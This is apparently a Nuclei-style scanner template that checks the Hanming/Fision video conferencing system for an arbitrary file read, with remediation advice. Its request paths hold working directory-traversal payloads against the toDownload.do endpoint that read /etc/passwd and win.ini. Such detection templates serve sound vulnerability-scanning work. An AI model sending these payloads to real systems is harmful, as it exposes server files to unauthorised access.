id: hanming-lfr
info:
  name: Hanming Video Conferencing File Read
  author:
  - l0ne1y
  tags:
  - lfr
  - hanming
  - lfi
  description: |-
    Fision video conferencing system arbitrary file download
    The Fision video conferencing system has an arbitrary file download issue. Attackers can obtain system files, server configuration files and so on through directory traversal attacks. Generally speaking, attackers exploit server APIs and standard file permissions to carry out the attack. Arbitrary file read/download vulnerabilities may exist in the web server software itself, or in the web application.
  reference:
  - https://mp.weixin.qq.com/s/f-m21pt0xn9qouwoc8llka
  severity: high
  remediation: |-
    Official remedy:
    1. It is recommended that users obtain the latest patch or the latest version program from the official website:
    https://tg.hst.com/

    Temporary remedy:
    1. Filter "." so that users cannot traverse to parent directories in the URL.
    2. Use regular expressions to strictly validate the format of user input parameters, hard-code or uniformly encode the file name parameters passed by users, control file types via a whitelist, and reject parameters containing malicious or empty characters.
    3. Prohibit the system from providing directory traversal services, e.g., configure open_basedir in php.ini to limit the file access scope.
    4. Store file paths in the database and let users submit the file ID to download files.
    5. Perform permission checks before users download files.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - bit app support
    - fonts
    - extensions
  - type: regex
    regex:
    - 'root:[x*]:0:0:'
  matchers-condition: or
  path:
  - '{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini'
  - '{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd'
  method: GET
  stop-at-first-match: true
